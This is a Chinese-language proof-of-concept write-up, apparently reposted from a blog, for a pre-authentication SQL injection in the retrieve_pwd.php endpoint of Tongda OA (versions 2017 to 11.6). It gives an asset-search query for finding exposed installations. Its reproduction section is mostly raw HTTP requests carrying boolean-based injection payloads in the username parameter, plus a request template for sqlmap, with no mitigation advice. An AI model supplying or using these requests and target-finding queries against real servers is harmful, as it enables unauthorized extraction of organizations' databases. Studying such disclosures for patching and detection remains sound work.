登录 白背景

通达OA retrieve_pwd存在前台SQL注入漏洞

一、漏洞简介

通达OA(Office Anywhere网络智能办公系统)是由北京通达信科科技有限公司自主研发的协同办公自动化软件,是与中国企业管理实践相结合形成的综合管理办公平台。通达OA为各行业不同规模的众多用户提供信息化管理能力,包括流程审批、行政办公、日常事务、数据统计分析、即时通讯、移动办公等,帮助广大用户降低沟通和管理成本,提升生产和决策效率。通达OA retrieve_pwd存在前台SQL注入漏洞,攻击者通过漏洞可以获取数据库信息。

二、影响版本

  • 通达OA2017-通达OA11 .6

三、资产测绘

  • hunterapp.name="通达 OA"
  • 特征

image.png

四、漏洞复现

GET /ispirit/retrieve_pwd.php?_GET[username]=admin%27+and+%271%27%3D%271+ HTTP/1.1
Host: 192.168.31.164
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: USER_NAME_COOKIE=admin; SID_1=2b4980ea; PHPSESSID=pshu97gqch67779m3q1i048tg0; KEY_RANDOMDATA=14077
Upgrade-Insecure-Requests: 1

image.png

GET /ispirit/retrieve_pwd.php?_GET[username]=admin%27+and+%271%27%3D%272+ HTTP/1.1
Host: 192.168.31.164
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: USER_NAME_COOKIE=admin; SID_1=2b4980ea; PHPSESSID=pshu97gqch67779m3q1i048tg0; KEY_RANDOMDATA=14077
Upgrade-Insecure-Requests: 1 

image.png
sqlmap

GET /ispirit/retrieve_pwd.php?_GET[username]=admin HTTP/1.1
Host: 192.168.31.164
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: USER_NAME_COOKIE=admin; SID_1=2b4980ea; PHPSESSID=pshu97gqch67779m3q1i048tg0; KEY_RANDOMDATA=14077
Upgrade-Insecure-Requests: 1 

image.png

原文: https://www.yuque.com/xiaokp7/ocvun2/ol91s8baitnzk2pf